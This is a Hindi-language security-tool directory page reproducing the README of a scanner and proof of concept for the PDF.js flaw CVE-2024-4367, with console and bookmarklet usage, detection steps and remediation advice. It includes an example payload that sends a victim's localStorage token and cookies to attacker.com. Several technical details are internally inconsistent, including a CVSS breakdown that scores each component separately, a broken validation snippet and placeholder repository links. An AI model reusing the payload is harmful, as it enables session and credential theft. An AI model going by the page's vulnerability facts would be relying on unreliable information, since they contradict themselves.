Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/veronimo669/pdf.js-cve-2024-4367
टोहीभेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगपेपर और शोधलर्निंग और शिक्षा
GitHubveronimo669/pdf.js-cve-2024-4367

pdf.js-CVE-2024-4367

CVE-2024-4367 के लिए स्कैन एंड POC

रिपॉजिटरी देखें
11 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🚨 CVE-2024-4367 - यूनिवर्सल PDF.js भेद्यता स्कैनर

⚠️ महत्वपूर्ण सुरक्षा उपकरण | CVE-2024-4367 (CVSS 9.8) का पता लगाता है - PDF.js रिमोट कोड निष्पादन भेद्यता

Version CVSS CVE License

किसी भी वेबसाइट पर कार्य करता है - शून्य कॉन्फ़िगरेशन आवश्यक


📋 विषय-सूची

  • 📖 अवलोकन
  • ⚡ त्वरित आरंभ
  • 🔍 यह क्या पता लगाता है
  • 🛠️ यह कैसे काम करता है
  • 📊 आउटपुट उदाहरण
  • 🔒 निवारण मार्गदर्शिका
  • 🎯 शोषण वैक्टर
  • 🧪 परीक्षण निर्देश
  • 📝 तकनीकी विवरण
  • ⚠️ कानूनी अस्वीकरण
  • 📚 संदर्भ

📖 अवलोकन

CVE-2024-4367 PDF.js (संस्करण < 4.2.67) में एक गंभीर भेद्यता है जो दुर्भावनापूर्ण PDF फ़ाइलों के माध्यम से मनमाना JavaScript निष्पादन की अनुमति देती है। यह स्कैनर किसी भी वेबसाइट पर भेद्य PDF.js इंस्टेंस को स्वचालित रूप से पता लगाता है।

यह स्कैनर क्यों अलग है

  • ✅ शून्य कॉन्फ़िगरेशन - किसी भी वेबसाइट पर तुरंत कार्य करता है
  • ✅ यूनिवर्सल पहचान - सभी JavaScript बंडलों को स्कैन करता है
  • ✅ कोई निर्भरता नहीं - शुद्ध JavaScript
  • ✅ प्रूफ ऑफ कॉन्सेप्ट - परीक्षण PDF उत्पन्न करता है
  • ✅ कार्रवाई योग्य परिणाम - स्पष्ट निवारण चरण

भेद्यता

PDF.js में एक दोष है जहाँ PDF फ़ाइलों में एम्बेडेड JavaScript उचित सैंडबॉक्सिंग के बिना निष्पादित हो जाता है, जिससे हमलावर निम्न कार्य कर सकते हैं:

  • 🏴‍☠️ localStorage/sessionStorage से प्रमाणीकरण टोकन चुराएँ
  • 🍪 सत्र कुकीज़ बाहर निकालें
  • 📁 स्थानीय फ़ाइलों तक पहुँचें (यदि Electron/डेस्कटॉप ऐप है)
  • 🔐 चुराए गए क्रेडेंशियल का उपयोग करके पीड़ित के रूप में कार्य करें
  • 🌐 XSS के माध्यम से आंतरिक नेटवर्क तक पहुँचें

⚡ त्वरित आरंभ

विधि 1: ब्राउज़र कंसोल (सबसे आसान)

  1. लक्षित वेबसाइट खोलें
  2. DevTools खोलने के लिए F12 दबाएँ
  3. कंसोल टैब पर जाएँ
  4. पूरा स्कैनर स्क्रिप्ट पेस्ट करें
  5. Enter दबाएँ
  6. स्क्रीन पर दृश्य परिणाम देखें!

विधि 2: बुकमार्कलेट

इस URL के साथ एक बुकमार्क बनाएँ:

root@kitploit:~
javascript:(function(){const s=document.createElement('script');s.src='https://cdn.jsdelivr.net/gh/yourusername/CVE-2024-4367-Scanner/scanner.js';document.body.appendChild(s);})();

विधि 3: सीधा डाउनलोड

root@kitploit:~
git clone https://github.com/yourusername/CVE-2024-4367-Scanner
cd CVE-2024-4367-Scanner
# Open any website and run the script

🔍 यह क्या पता लगाता है

चरण 1: JavaScript बंडल स्कैनिंग

  • ✅ PDF.js संस्करण पहचान
  • ✅ असुरक्षित संस्करण की पहचान (< 4.2.67)
  • ✅ Package.json संदर्भ
  • ✅ Node_modules पथ

चरण 2: PDF व्यूअर पहचान

  • ✅ `` PDF व्यूअर
  • ✅ <embed> तत्व
  • ✅ <object> डेटा टैग
  • ✅ कस्टम PDF व्यूअर कंटेनर
  • ✅ Canvas-आधारित रेंडरर

चरण 3: शोषण वैक्टर

  • ✅ URL पैरामीटर (?pdf=, ?file=, ?src=)
  • ✅ PDF अपलोड फ़ॉर्म
  • ✅ .pdf स्वीकार करने वाले फ़ाइल इनपुट फ़ील्ड
  • ✅ PDF पथ वाले API एंडपॉइंट

चरण 4: दृश्य संकेतक

  • ✅ लाइव भेद्यता स्थिति
  • ✅ डाउनलोड करने योग्य प्रूफ-ऑफ-कॉन्सेप्ट PDF
  • ✅ रीयल-टाइम DOM ओवरले

🛠️ यह कैसे काम करता है

root@kitploit:~
┌─────────────────────────────────────────────────────────────┐
│                    SCAN PROCESS FLOW                        │
├─────────────────────────────────────────────────────────────┤
│                                                             │
│  1. 📚 LOAD SCRIPTS                                         │
│     ├─ External scripts (all <script src="">)              │
│     └─ Inline scripts (all <script> tags)                  │
│                                                             │
│  2. 🔍 EXTRACT PDF.JS VERSION                               │
│     ├─ Pattern matching in code                             │
│     ├─ Package.json detection                               │
│     └─ Node_modules path parsing                            │
│                                                             │
│  3. 🎯 IDENTIFY VULNERABILITY                               │
│     ├─ version < 4.2.67 ? → VULNERABLE                     │
│     └─ version = 2.16.105 ? → VULNERABLE                   │
│                                                             │
│  4. 🖼️ LOCATE VIEWERS                                       │
│     ├─ DOM element scanning                                 │
│     └─ Attribute detection                                 │
│                                                             │
│  5. ⚡ GENERATE POC                                         │
│     ├─ Create test PDF                                      │
│     └─ Provide download link                                │
│                                                             │
│  6. 📊 DISPLAY RESULTS                                      │
│     ├─ Visual overlay                                       │
│     ├─ Console report                                       │
│     └─ Global variable storage                              │
│                                                             │
└─────────────────────────────────────────────────────────────┘

📊 आउटपुट उदाहरण

कंसोल आउटपुट

root@kitploit:~
╔═══════════════════════════════════════════════════════════════════════════════════╗
║                    CVE-2024-4367 - UNIVERSAL PDF.js SCANNER                         ║
║              Detects vulnerable PDF.js versions and potential exploitation         ║
╚═══════════════════════════════════════════════════════════════════════════════════╝

📚 PHASE 1: Scanning JavaScript Bundles for PDF.js
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[+] Found 42 external scripts
[+] Found 12 inline scripts
   [1/42] Analyzing: vendor.bundle.js
      → PDF.js indicator found: pdfjs-dist
      ✅ PDF.js version found: 2.16.105
      🚨 VULNERABLE to CVE-2024-4367!

🎯 PHASE 4: Identifying Exploitation Vectors
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
   ⚠️ URL parameter accepts PDF: file=/documents/report.pdf
   ⚠️ PDF upload form found

█████████████████████████████████████████████████████████████████████████████████
                          FINAL SCAN REPORT
█████████████████████████████████████████████████████████████████████████████████

🚨 CRITICAL VULNERABILITY CONFIRMED!
   CVE: CVE-2024-4367
   CVSS: 9.8 (CRITICAL)
   Impact: Arbitrary JavaScript Execution

विज़ुअल ओवरले

स्कैनर ओवरले

root@kitploit:~
┌─────────────────────────────────────────────────────────────┐
│  CVE-2024-4367 SCAN RESULTS                                │
│  ━━━━━━━━━━━━━━━━━━━━━━━                                    │
│  📍 Target: example.com                                    │
│  📦 PDF.js: 2.16.105                                       │
│  🎯 Vulnerable: YES                                        │
│  📄 Viewers: 3                                             │
│  ⚡ Vectors: 2                                             │
│  ━━━━━━━━━━━━━━━━━━━━━━━                                    │
│  🔴 CRITICAL - Upgrade Required                            │
└─────────────────────────────────────────────────────────────┘

🔒 निवारण मार्गदर्शिका

तत्काल कार्रवाई

1. PDF.js अपग्रेड करें (अनुशंसित)

root@kitploit:~
# For Node.js projects
npm install pdfjs-dist@latest

# For CDN usage
# Update to version 4.2.67 or higher

2. JavaScript निष्पादन अक्षम करें

root@kitploit:~
// Set this before loading PDF.js
pdfjsLib.GlobalWorkerOptions.disableJavaScript = true;

3. सामग्री सुरक्षा नीति

root@kitploit:~
Content-Security-Policy: script-src 'self'; 
                        object-src 'none'; 
                        worker-src 'none'

4. इनपुट सत्यापन

root@kitploit:~
// Validate PDF files before rendering
function validatePDF(file) {
    // Check magic bytes
    const header = file.slice(0, 5);
    if (header !== '%PDF-') {
        throw new Error('Invalid PDF file');
    }
    
    // Scan for JavaScript
    const text = file.toString();
    if (text.includes('/JavaScript') || 
        text.includes('/JS') ||
        text.includes('<< /S /JavaScript >>')) {
        throw new Error('PDF contains JavaScript');
    }
}

दीर्घकालिक समाधान


🎯 शोषण वैक्टर

पता लगाए गए सामान्य वैक्टर

  1. URL पैरामीटर

    root@kitploit:~
    /viewer?file=malicious.pdf
    /download?pdf=malicious.pdf
    
  2. फ़ाइल अपलोड

    root@kitploit:~
    <input type="file" accept=".pdf">
    
  3. एम्बेडेड व्यूअर

    root@kitploit:~
    
    <embed src="malicious.pdf">
    
  4. API एंडपॉइंट

    root@kitploit:~
    /api/documents/123/download
    /api/report/pdf
    

उदाहरण दुर्भावनापूर्ण पेलोड

root@kitploit:~
// PDF embedded JavaScript
this.alert('CVE-2024-4367 Exploited!');
fetch('https://attacker.com/steal', {
    method: 'POST',
    body: JSON.stringify({
        token: localStorage.getItem('token'),
        cookies: document.cookie
    })
});

🧪 परीक्षण निर्देश

चरण-दर-चरण परीक्षण

  1. स्कैनर स्थापित करें

    root@kitploit:~
    git clone https://github.com/yourusername/CVE-2024-4367-Scanner
    
  2. स्कैनर चलाएँ

    root@kitploit:~
    # Open the target website
    # Paste the scanner in console
    # Or use the bookmarklet
    
  3. परिणामों का विश्लेषण करें

    • "VULNERABLE" स्थिति देखें
    • PDF.js संस्करण नोट करें
    • शोषण वैक्टर जाँचें
  4. POC PDF डाउनलोड करें (यदि असुरक्षित है)

    • डाउनलोड बटन पर क्लिक करें
    • PDF अपलोड/खोलें
    • JavaScript निष्पादन का अवलोकन करें
  5. फिक्स लागू करें

    • PDF.js अपग्रेड करें
    • CSP लागू करें
    • इनपुट सत्यापित करें

अपेक्षित परिणाम

परिदृश्यपरिणाम
PDF.js 2.16.105🔴 गंभीर
PDF.js 3.x🔴 भेद्य
PDF.js 4.0.x🔴 भेद्य
PDF.js 4.2.67+✅ सुरक्षित

📝 तकनीकी विवरण

संस्करण जाँच

root@kitploit:~
// Vulnerable versions
const VULNERABLE_VERSIONS = [
    { version: '2.16.105', status: 'CRITICAL' },
    { version: '3.x.x', status: 'CRITICAL' },
    { version: '4.0.x - 4.2.66', status: 'CRITICAL' }
];

// Safe version
const SAFE_VERSION = '4.2.67';

भेद्यता समयरेखा

तिथिघटना
2024-04-23भेद्यता की खोज हुई
2024-04-24CVE-2024-4367 आवंटित किया गया
2024-04-25पैच जारी किया गया (4.2.67)

CVSS स्कोर विवरण


⚠️ कानूनी अस्वीकरण

महत्वपूर्ण: यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है।

  • ✅ करें - इसका उपयोग अपनी स्वयं की वेबसाइटों पर करें
  • ✅ करें - स्पष्ट अनुमति के साथ उपयोग करें
  • ✅ करें - सुरक्षा अनुसंधान के लिए उपयोग करें
  • ❌ न करें - अनधिकृत प्रणालियों पर उपयोग न करें
  • ❌ न करें - दुर्भावनापूर्ण उद्देश्यों के लिए उपयोग न करें

लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं।


📚 संदर्भ

आधिकारिक संसाधन

  • CVE-2024-4367 - NIST NVD
  • PDF.js सुरक्षा सलाह
  • Mozilla सुरक्षा ब्लॉग

संबंधित भेद्यताएँ

  • CVE-2024-4367 - PDF.js RCE
  • CVE-2023-xxxx - पिछली PDF.js समस्याएँ
  • वेब अनुप्रयोगों में PDF.js के माध्यम से XSS

उपकरण और संसाधन

  • PDF.js आधिकारिक रिपॉजिटरी
  • OWASP XSS रोकथाम
  • CSP संदर्भ

शोध पत्र

  • PDF.js सुरक्षा विश्लेषण
  • क्लाइंट-साइड PDF रेंडरिंग जोखिम

🤝 योगदान

योगदान का स्वागत है! कृपया:

  1. रिपॉजिटरी को फोर्क करें
  2. एक फीचर ब्रांच बनाएँ
  3. एक पुल रिक्वेस्ट सबमिट करें
  4. कोड शैली का पालन करें

विकास सेटअप

root@kitploit:~
git clone https://github.com/yourusername/CVE-2024-4367-Scanner
cd CVE-2024-4367-Scanner
# Make your changes
# Test on multiple websites
# Submit PR

📄 लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।


🌟 समर्थन

यदि आपको यह उपकरण उपयोगी लगता है:

  • ⭐ रिपॉजिटरी को स्टार करें
  • 🐛 समस्याएँ रिपोर्ट करें
  • 📝 दस्तावेज़ीकरण लिखें
  • 🔧 फिक्स सबमिट करें

🛡️ सुरक्षित रहें। जल्दी परीक्षण करें। बार-बार परीक्षण करें।

सुरक्षा समुदाय द्वारा ❤️ के साथ निर्मित

समस्या रिपोर्ट करें • GitHub पर स्टार करें • दस्तावेज़ीकरण पढ़ें

टूल डाउनलोड करें
समाधानकठिनाईप्रभावशीलता
PDF.js अपग्रेड करेंआसान✅ पूर्ण फिक्स
PDF.js में JS अक्षम करेंआसान✅ पूर्ण फिक्स
CSP कार्यान्वयनमध्यम✅ अच्छा
सर्वर-साइड सत्यापनमध्यम✅ अच्छा
सैंडबॉक्स्ड रेंडरिंगकठिन✅ उत्कृष्ट
PDF.js नहीं हैℹ️ सुरक्षित
2024-04-26सार्वजनिक खुलासा
2024-05-01शोषण प्रयास देखे गए
घटकस्कोर
आक्रमण वेक्टरनेटवर्क (9.8)
आक्रमण जटिलतानिम्न (9.8)
आवश्यक विशेषाधिकारकोई नहीं (9.8)
उपयोगकर्ता सहभागिताआवश्यक (8.8)
दायरापरिवर्तित (9.1)
गोपनीयताउच्च (9.8)
अखंडताउच्च (9.8)
उपलब्धताउच्च (9.8)
कुल9.8 (गंभीर)